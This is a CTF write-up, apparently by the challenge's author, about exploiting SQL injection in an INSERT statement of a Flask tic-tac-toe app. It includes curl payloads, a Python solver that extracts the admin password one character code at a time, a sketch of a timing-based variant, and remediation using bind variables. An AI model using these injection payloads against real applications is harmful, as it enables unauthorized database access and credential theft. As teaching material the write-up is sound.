- A users table (users), containing the password (and the flag!).
- A games table (games), with each game linked to a user.
- A moves table (moves), with each move linked to a game, containing the position (position) and the value (value), which represents the player: X or O.
We already know that the flag is the password of the admin user, encoded as base64 in a row of the users table. The next step is to take a look at the application and see how it interacts with the database, to find out how we can retrieve that information.
The application, app.py, is built in Python using the Flask web framework. Since the code has 368 lines, we will not go through each one here (phew!).
Most of this code has a simpler role: making the tic-tac-toe game work. The focus will be on the code snippets with the vulnerabilities we are going to exploit.
Something that stands out at first glance is that the application does not use bind variables to pass parameter values to the SQL commands. This is a serious flaw, punishable by death in some countries.
Let's look, for example, at how the login process is handled:
@app.route('/login', methods=['GET', 'POST'])
def login():
    user_id, username = getuser()
    if request.method == 'GET':
        if not(user_id is None):
            return redirect(url_for('index'))
        return render_template('login.html', username=username)
    if not(user_id is None):
        return 'Already logged in', 400
    username = request.form.get('username')
    password = request.form.get('password')
    try:
        filter_param('username', username)
        filter_param('password', password)
        password = b64encode(bytes(password, 'UTF-8')).decode('UTF-8')
        db, command = getdb()
        command.execute(f'select id from users where username = "{username}" and password = "{password}"')
        result = command.fetchone()
        if result is None:
            return 'Invalid Username or Password', 404
        user_id = result[0]
        if user_id is None:
            return 'Invalid Username or Password', 404
        command.close()
        session['user_id'] = user_id
        session['username'] = username
        return redirect(url_for('index'))
    except mysql.connector.errors.IntegrityError:
        return 'Username already exists!', 400
    except ValueError as valerr:
        return f'DANGER: {valerr}', 400
    except Exception as err:
        traceback.print_exc()
        return 'Internal Error!', 500
When it calls the SQL command to validate the username and password in the database, it simply concatenates the string, as shown below, placing the values between quotes:
command.execute(f'select id from users where username = "{username}" and password = "{password}"')
Normally, this indicates a very simple SQL Injection, where the attacker can send quotes in the username or password to inject SQL commands. Note: I will not explain the basic concept of SQL Injection here, since it is well known and basic, but I leave references.
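For readers who have never seen the difference in practice, here is a minimal generic sketch comparing string concatenation with bind variables. Assumptions: it uses Python's built-in sqlite3 with an in-memory table as a stand-in for the app's MySQL database, the function names and the stored password are made up, and it does not reproduce the app's exact login flow (which also filters and base64-encodes the input).

```python
import sqlite3

# In-memory stand-in for the users table (hypothetical data).
db = sqlite3.connect(":memory:")
db.execute("create table users (id integer primary key, username text, password text)")
db.execute("insert into users (username, password) values (?, ?)", ("admin", "c2VjcmV0"))

def login_unsafe(username, password):
    # Values are pasted straight into the SQL text, like the f-string pattern above.
    query = f"select id from users where username = '{username}' and password = '{password}'"
    return db.execute(query).fetchone()

def login_bound(username, password):
    # Bind variables: the driver sends the values separately from the SQL text.
    query = "select id from users where username = ? and password = ?"
    return db.execute(query, (username, password)).fetchone()

payload = "' or '1'='1"
print(login_unsafe("admin", payload))  # the quote breaks out of the string literal
print(login_bound("admin", payload))   # the payload is treated as a plain value
```

With bind variables there is nothing to filter, because the input never becomes part of the SQL syntax.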
Despite the terrible practice, the parameters are filtered on the preceding lines by the filter_param function.
filter_param('username', username)
filter_param('password', password)
Let's understand what this function does:
DANGER_CHARSET = '"\'\\;\n\r\t'
# ... several lines later ...
def filter_param(name, value):
    if not isinstance(value, str):
        raise ValueError(f'Invalid parameter format for "{name}"!')
    for ch in DANGER_CHARSET:
        if ch in value:
            raise ValueError(f'Invalid character in parameter "{name}"!')
    if value.find('--') > 0 or value.find('/*') > 0:
        raise ValueError(f'SQL comment not allowed in parameter "{name}"!')
Summary
With that, IN THEORY, the application would be protected against SQL Injections. Let's test the theory by including quotes in the username.
When you click Entrar (Log in), it generates the error below, interrupting the login process.
DANGER: Invalid character in parameter "username"!
Although the bad practice is terrible, it seems to be well fenced in by a super filter, right? Right???
With a little more analysis, we can see a SQL statement where the filter_param function is being applied, but the value is not between quotes!
def insert_move(current_moves, position, player):
    game_id = current_moves['game_id']
    try:
        db, command = getdb()
        command.execute(f'insert into moves (game_id, position, value) values ({game_id}, {position}, "{player}")')
        db.commit()
        command.close()
    except mysql.connector.errors.IntegrityError:
        raise ValueError('Invalid Move! Try Again')
Summary
- game_id: inserted into the SQL without quotes
- position: inserted into the SQL without quotes
Analyzing the code, we find that this function is called in the /game/<string:game_key>/move route, which receives, via POST, the game_key (the game's UUID) in the URL and the position in the POST body.
@app.route('/game/<string:game_key>/move', methods=['POST'])
def move(game_key):
    user_id, _ = getuser()
    if user_id is None:
        return 'You need to log in first', 400
    param_position = request.form.get('position')
    try:
        filter_param('position', param_position)
        position = param_position
    except ValueError as valerr:
        traceback.print_exc()
        return f'Invalid Position for Move', 400
    try:
        filter_param('game_key', game_key)
        uuid.UUID(game_key, version=4)
    except ValueError:
        return 'Invalid Game Key', 400
    try:
        moves = user_move(game_key, user_id, position)
    except mysql.connector.errors.DatabaseError:
        traceback.print_exc()
        return 'Internal Error!', 500
    except ValueError as valerr:
        return f'{valerr}', 400
    return jsonify(moves)
Summary
- Filters position and game_key via filter_param.
- Validates that game_key is a valid UUIDv4.
- Calls user_move with the values of the parameters that were sent.
To finish understanding the flow, we need to dive one level deeper and understand the user_move function:
Note: only the beginning of the function matters at this point.
def user_move(game_key, user_id, position):
    current_moves = get_moves(game_key, user_id)
    game_id = current_moves['game_id']
    if current_moves['winner'] != '?':
        raise ValueError(f'Game is over!')
    # User Move
    insert_move(current_moves, position, 'X')
    # ... Rest of the function ...
We could try to use game_key, but since it needs to be a valid UUID, there does not seem to be much room for exploitation here.
On the other hand, the position parameter is validated only against a group of characters involved in closing a string, comments, or ending a SQL command, but the code does not validate that position is an integer. We have a possible SQLi.
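The gap can be seen in isolation with a tiny sketch. filter_param below is copied from the app; is_integer_position is a hypothetical stricter check of my own, just to show what is missing, and is not something the app has.

```python
DANGER_CHARSET = '"\'\\;\n\r\t'

def filter_param(name, value):
    # Copied from the app: a blocklist of characters and comment markers.
    if not isinstance(value, str):
        raise ValueError(f'Invalid parameter format for "{name}"!')
    for ch in DANGER_CHARSET:
        if ch in value:
            raise ValueError(f'Invalid character in parameter "{name}"!')
    if value.find('--') > 0 or value.find('/*') > 0:
        raise ValueError(f'SQL comment not allowed in parameter "{name}"!')

def is_integer_position(value):
    # Hypothetical allowlist check: only plain ASCII digits are accepted.
    return isinstance(value, str) and value.isascii() and value.isdigit()

payload = '(select 2+1)'
filter_param('position', payload)    # no exception: the blocklist lets it through
print(is_integer_position(payload))  # an integer check would have rejected it
print(is_integer_position('1'))      # while a normal move is still accepted
```

A blocklist has to anticipate every dangerous input, while an allowlist only has to describe the valid ones.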
Unlike the traditional ' or ''=', this SQLi is in an INSERT, so it writes the value somewhere instead of returning values directly.
Let's follow this request in the browser to simulate the injection. (Burp users will do this more easily, but let's go the artisanal way.)
Let's start a new game in the app, open the browser's Developer Tools (F12), and check the request sent when we click the first position (top-left corner).
After the click, the request below is sent. Note that I removed several headers that are irrelevant to the analysis.
POST /game/addb868e-429e-4ef2-b2d1-099ca950a346/move HTTP/1.1
Content-Length: 10
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Host: localhost:5000
position=1
The value 1 for position indicates the first move of the game. The generated SQL looks like this:
insert into moves
(game_id, position, value)
values (1, 1, "X")
Summary
- game_id, obtained from the games table, which we do not have access to.
- position, which is precisely our point of attack.
- player, which is fixed for our moves.
The response to the request comes in JSON format:
{
"O": [8],
"X": [1],
"game_id": 1,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
Basically it is the game status, including the moves of “X” (you), the moves of “O” (the machine), the game id, the game_key, and the winner (if any; in this case, the game is not finished yet).
Note that the value 1 that we sent came back as the first move of X.
Let's try a next step to validate that we can generate SQL here, sending the value 1+1 as position, so that the generated SQL looks like this:
insert into moves
(game_id, position, value)
values (1, 1+1, "X")
We expect, of course, the generated value to be 2.
Sending it with curl, with URL-encoded parameters:
curl 'http://localhost:5000/game/8436bd1e-4436-4f41-8ea0-9d39da8d8036/move' \
-H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' \
-H 'Cookie: session=eyJ1c2VyX2lkIjoyLCJ1c2VybmFtZSI6Im5lcHR1bmlhbjEifQ.Y5MZ8Q.jwVLLcNg7oQKDcVVC6ZC8lMol80' \
--data-raw 'position=1%2B1'
Response:
invalid literal for int() with base 10: '1+1'
We have an error here!!
This is a Python error (not a MySQL one), which occurs when you call the int() function with a value that is not an integer, in this case 1+1.
It happens here on line 129, right after the insert_move call, which generates the SQL:
insert_move(current_moves, position, 'X')
current_moves['X'].append(int(position))
This gives the impression that the SQL Injection failed, after all we received an error, BUT you can see that the move was inserted anyway!
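The ordering issue can be reproduced in a few lines. This is only a sketch under assumptions: it uses Python's built-in sqlite3 with an in-memory table instead of the app's MySQL database, and the simplified insert_move and user_move below are my own reductions of the app's functions.

```python
import sqlite3

# In-memory stand-in for the moves table.
db = sqlite3.connect(":memory:")
db.execute("create table moves (game_id integer, position integer, value text)")

def insert_move(game_id, position, player):
    # Same unquoted interpolation of position as in the app's INSERT.
    db.execute(
        f"insert into moves (game_id, position, value) values ({game_id}, {position}, '{player}')"
    )
    db.commit()

def user_move(game_id, position):
    insert_move(game_id, position, "X")  # the row is committed here...
    return int(position)                 # ...before int() raises ValueError

try:
    user_move(1, "(select 2+1)")
    error = None
except ValueError as err:
    error = str(err)

rows = db.execute("select game_id, position, value from moves").fetchall()
print(error)  # the Python error the client sees
print(rows)   # the injected value is stored anyway
```

The error only affects the HTTP response; the database has already accepted the write.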
Despite the error returned by this request, it is possible to check the game status through another route, game/<game_key>/info, which is called when you load a game.
Response:
{
"O": [7],
"X": [1,2],
"game_id": 3,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
Player X now has moves 1 and 2, according to our diabolical plan.
We validated that we can include an expression. Can we include SQL? The important thing is not to include any of the blocked characters (quotes, etc.).
Let's try position 3, but now using a subquery, with the payload:
position=(select 2+1)
This generates the SQL below:
insert into moves
(game_id, position, value)
values (1, (select 2+1), "X")
Let's get to the fight:
curl 'http://localhost:5000/game/8436bd1e-4436-4f41-8ea0-9d39da8d8036/move' \
-H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' \
-H 'Cookie: session=eyJ1c2VyX2lkIjoyLCJ1c2VybmFtZSI6Im5lcHR1bmlhbjEifQ.Y5MZ8Q.jwVLLcNg7oQKDcVVC6ZC8lMol80' \
--data-raw 'position=(select%202%2B1)'
We receive the same response with the Python error, but /info returns:
{
"O": [7],
"X": [1,2,3],
"game_id": 3,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
X now includes the value 3, the result of the subquery we inserted. Attack proven, or your money back.
We have a SQL injection, but we still need to extract the flag, which is the Admin's password, encoded in base64.
Here we have a limitation: we can only insert an integer value, since the POSITION field of the moves table is of type INTEGER.
Nothing that is a problem, after all we can insert several rows and represent any digital information as a sequence of numbers ;)
In this case, we can store the code of each character of the password as a new POSITION. In theory, this should be a problem (positions already taken), but there is no constraint in the database preventing it, so… good for us.
Let's test this hypothesis by injecting a subquery that inserts the ASCII code of the first character of the admin password. Since admin is the first user to be inserted, its user ID is 1.
position=(select ord(substring(password, 1, 1)) from users where id = 1)
Note: You can also look up the admin user by name, but then you need to bypass the quote blocking. I leave that as an exercise.
The generated SQL looks like this:
insert into moves
(game_id, position, value)
values (1, (select ord(substring(password, 1, 1)) from users where id = 1), "X")
Off to curl:
curl 'http://localhost:5000/game/8436bd1e-4436-4f41-8ea0-9d39da8d8036/move' \
-H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' \
-H 'Cookie: session=eyJ1c2VyX2lkIjoyLCJ1c2VybmFtZSI6Im5lcHR1bmlhbjEifQ.Y5MZ8Q.jwVLLcNg7oQKDcVVC6ZC8lMol80' \
--data-raw 'position=(select%20ord(substring(password%2C%201%2C%201))%20from%20users%20where%20id%20%3D%201)'
Response from /info:
{
"O": [7],
"X": [1,2,3,89],
"game_id": 3,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
The number 89 is the ASCII code of the letter Y. Note that Y is the first letter of the base64 in our simulated environment, YmhhY2t7ZmxhZ19wYXJhX3Rlc3Rlc30K.
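To see where this is heading, here is a small offline sketch of the decoding side: turning a list of character codes back into the base64 string and then into the flag. The list of codes is simulated from the test password of the local environment; decode_moves is a helper name I made up for the illustration.

```python
import base64

def decode_moves(codes):
    """Rebuild the base64 string from character codes and decode it."""
    encoded = "".join(chr(code) for code in codes)
    return base64.b64decode(encoded)

# Simulate what the injected subqueries would store, one code per character.
sample = "YmhhY2t7ZmxhZ19wYXJhX3Rlc3Rlc30K"
codes = [ord(ch) for ch in sample]

print(codes[0])             # code of the first character, 'Y'
print(len(codes))           # number of moves we would need to insert
print(decode_moves(codes))  # the decoded test flag
```

The only requirement is that the codes are read back in the same order they were inserted.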
Now we just have to do this for each character of the password. But for that, we first need to get the length of the password, which is already easy.
Let's go straight to the subquery:
(select length(password) from users where id = 1)
Response:
{
"O": [7],
"X": [1,2,3,89,32],
"game_id": 3,
"game_key": "addb868e-429e-4ef2-b2d1-099ca950a346",
"winner": "?"
}
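The last value returned is 32, which is exactly the length of the password.
With that, the action plan looks like this:
- Insert the length of the admin password as a move.
- Read that length from /game/<game_key>/info.
- Insert the code of each character of the password as a move.
- Read all the moves from /game/<game_key>/info.
- Convert the X values into characters (keeping the order).
Let's exploit.
To make running the exploit easier, it is worth starting the process from scratch, registering a new user and creating a new game to perform these steps. The basic structure looks like this: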
def crackit():
    register()
    login()
    game_key = newgame()
    enc_pwd = get_encoded_password(game_key)
    pwd = base64.b64decode(enc_pwd)
    print(pwd)
I will not explain each step here, since this thing is already turning into a bible.
The get_encoded_password function shows the structure of our action plan:
def get_encoded_password(game_key):
    size = insert_pwd_size(game_key)
    encoded = brute_pwd(game_key, size)
    result_str = ''
    for code in encoded[1:]:
        result_str += chr(code)
    return result_str
First we get the length of the password with the insert_pwd_size function:
def insert_pwd_size(game_key):
    data = {
        'position': f'(select length(password) from users where id = 1)',
    }
    request(f'/game/{game_key}/move', data=data)
    return int(get_my_moves(game_key)[0])
Then we insert the character codes one by one with the brute_pwd and insert_pwd_pos functions (ignoring the output):
def insert_pwd_pos(game_key, pwd_position):
    data = {
        # substring() is 1-based in MySQL, hence the +1
        'position': f'(select ord(substring(password, {pwd_position+1}, 1)) from users where id = 1)',
    }
    return request(f'/game/{game_key}/move', data=data)


def brute_pwd(game_key, size):
    for pos in range(size):
        insert_pwd_pos(game_key, pos)
    return get_my_moves(game_key)
Once everything has been inserted blindly, but with hope, we fetch the result with the get_my_moves function.
def get_my_moves(game_key):
    response = request(f'/game/{game_key}/info', data=None, method='GET')
    return response.json()['X']
From there, we already have our result in base64, ready to decode. Let's run this thing.
Note: the solver.py code points to http://localhost:5000, which is the address of the local environment, defined in docker-compose.yml.
Note: I'll trim the lines here because the output is long.
$ python solver.py
==> REQUEST to http://localhost:5000/register
{'username': 'neptunianxxx715', 'password': 'neptunianpwdxxx715'}
RESPONSE: 200
# ... a bunch of lines
==> REQUEST to http://localhost:5000/newgame
{'None': 0}
RESPONSE: 200
{"game_key":"87228aac-decc-4911-be31-05c05aa78ca5"}
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/move
{'position': '(select length(password) from users where id = 1)'}
RESPONSE: 400
invalid literal for int() with base 10: '(select length(password) from users where id = 1)'
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/info
None
RESPONSE: 200
{"O":[],"X":[32],"game_id":7,"game_key":"87228aac-decc-4911-be31-05c05aa78ca5","winner":"?"}
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/move
{'position': '(select ord(substring(password, 1, 1)) from users where id = 1)'}
RESPONSE: 400
invalid literal for int() with base 10: '(select ord(substring(password, 1, 1)) from users where id = 1)'
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/move
{'position': '(select ord(substring(password, 2, 1)) from users where id = 1)'}
RESPONSE: 400
invalid literal for int() with base 10: '(select ord(substring(password, 2, 1)) from users where id = 1)'
# ... a whole lot more lines
==> REQUEST to http://localhost:5000/game/87228aac-decc-4911-be31-05c05aa78ca5/info
None
RESPONSE: 200
{"O":[],"X":[32,89,109,104,104,89,50,116,55,90,109,120,104,90,49,57,119,89,88,74,104,88,51,82,108,99,51,82,108,99,51,48,75],"game_id":7,"game_key":"87228aac-decc-4911-be31-05c05aa78ca5","winner":"?"}
b'bhack{flag_para_testes}\n'
We got our flag (from local testing)!!
If you had run this script on the day of the challenge, you would have gotten the scoring flag:
bhack{$qL1_m4njad0_M@$_d1v3rtE_749db6dd8b4a74a349a8a14a12b43d3f113fea67}
The complete final exploit code can be found here: solver.py.
It was extremely interesting to follow the engagement during the CTF, because the challenge ended up drawing a lot of interest from some teams.
Unfortunately, at some point we started getting errors that made the challenge unstable:
MySQL Connection not available
This error comes from some problem related to the connection pool we used for MySQL in this case, from mysql.connector.
We took a general look at the issue, but haven't yet had the time to investigate it properly.
Still, it's a lesson learned for future CTFs.
Because of this, the challenge had to be restarted several times.
Even so, it was an excellent experience, and my impression is that the teams had fun and learned a lot in the process.
The challenge had one solve, by the team that finished first in the CTF, Cinquenta Tons de Vermelho.
Unfortunately I couldn't go over the details of the solution with the team, but I know it was a timing attack using MySQL's sleep function.
I didn't foresee that and I loved it :)
The only catch is that this solution required a much larger volume of requests, because each character had to be brute-forced, costing the players more time.
The timing attack also carries some precision risks, so the team had to re-run the payload a few times to revisit characters that failed.
This also ended up amplifying the challenge's bug, making more restarts necessary.
In any case, that has more to do with the architecture of the challenge itself. The team's solution was very smart and creative.
Thanks a lot!
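To make the cost of a timing-based approach concrete, here is a rough sketch of how such an extraction could be structured. This is not the team's actual solution (its details were never shared). The payload format, the candidate alphabet and the is_slow callback are all assumptions made for illustration. The "server" is simulated offline with the local test password.

```python
import string

# Candidate characters: the base64 alphabet (assumption based on the
# base64 string seen in the local test environment).
ALPHABET = string.ascii_letters + string.digits + "+/="


def timing_payload(pos, code, delay=2):
    """Hypothetical subquery: MySQL sleeps only when the guess is right."""
    return (
        f"(select if(ord(substring(password, {pos}, 1)) = {code}, "
        f"sleep({delay}), 0) from users where id = 1)"
    )


def extract(length, is_slow):
    """Recover `length` characters by trying every candidate per position.

    is_slow(pos, code) stands in for "send timing_payload(pos, code) and
    check whether the response took longer than the delay".
    """
    recovered, requests_sent = "", 0
    for pos in range(1, length + 1):
        for char in ALPHABET:
            requests_sent += 1
            if is_slow(pos, ord(char)):
                recovered += char
                break
    return recovered, requests_sent


# Offline stand-in for the server, using the local test password.
secret = "YmhhY2t7ZmxhZ19wYXJhX3Rlc3Rlc30K"
recovered, requests_sent = extract(
    len(secret), lambda pos, code: ord(secret[pos - 1]) == code
)
print(timing_payload(1, ord("Y")))
print(recovered == secret, requests_sent, "requests vs", len(secret) + 1)
```

In this simulation the oracle never errs. Against a real server, network jitter can make a wrong guess look slow or a right one look fast, which is why failed characters need to be revisited.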
Photo: Mente Binária article
At first I wondered whether to make the challenge a bit harder.
Currently it allows any value to be inserted in the position field, but one complicating factor would be to restrict it, as a database constraint, to values from 1 to 9. Another restriction would be to forbid repeated values within a game.
That would require a char-by-char brute force via boolean-based search, also opening several different games (it could be optimized, but this way would be enough).
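A minimal sketch of what those two restrictions could look like, using SQLite from the Python standard library so it runs anywhere. The moves table and its columns are hypothetical, since the real schema is not shown here. The challenge itself ran on MySQL, where syntax and enforcement may differ.

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# Hypothetical table: the real schema of the challenge is not shown.
conn.execute(
    """
    create table moves (
        game_id  integer not null,
        position integer not null check (position between 1 and 9),
        unique (game_id, position)
    )
    """
)


def try_move(game_id, position):
    """Return True if the database accepts the move, False if a constraint rejects it."""
    try:
        with conn:  # commits on success, rolls back on error
            conn.execute(
                "insert into moves (game_id, position) values (?, ?)",
                (game_id, position),
            )
        return True
    except sqlite3.IntegrityError:
        return False


print(try_move(1, 5))   # valid board position
print(try_move(1, 89))  # leaked character code, outside 1..9
print(try_move(1, 5))   # repeated position in the same game
```

With both constraints in place a character code such as 89 can no longer be stored as a move, so the only signal left is whether an insert succeeded, which is what pushes the attack toward a boolean-based search.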
Another approach would be a SQL Injection via the username, creating a fake session by brute-forcing the Flask secret key.
But that would involve too much guesswork, so it was better to drop the idea.
Example of vulnerable code (user_id unfiltered):
command.execute(f'select id, winner from games where game_key = "{game_key}" and user_id = {user_id}')
Use bind variables to pass the values instead of string concatenation.
USERS
”.
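The difference between string concatenation and bind variables can be seen in a small, self-contained sketch. It uses SQLite from the standard library, with a made-up games table and made-up rows. The challenge used mysql.connector, where the placeholder is %s rather than ?, but the idea is the same.

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# Made-up table and rows, only for illustration.
conn.execute(
    "create table games (id integer, winner text, game_key text, user_id integer)"
)
conn.executemany(
    "insert into games values (?, ?, ?, ?)",
    [(1, "?", "key-admin", 1), (2, "?", "key-player", 2)],
)


def find_game_vulnerable(game_key, user_id):
    # Same shape as the vulnerable query: values are pasted into the SQL text.
    query = (
        f"select id, winner from games "
        f"where game_key = '{game_key}' and user_id = {user_id}"
    )
    return conn.execute(query).fetchall()


def find_game_bound(game_key, user_id):
    # Values travel separately from the SQL text, so they are never parsed as SQL.
    query = "select id, winner from games where game_key = ? and user_id = ?"
    return conn.execute(query, (game_key, user_id)).fetchall()


malicious_user_id = "2 or 1 = 1"
print(find_game_vulnerable("key-player", malicious_user_id))  # every game leaks
print(find_game_bound("key-player", malicious_user_id))       # no match
print(find_game_bound("key-player", 2))                       # normal lookup still works
```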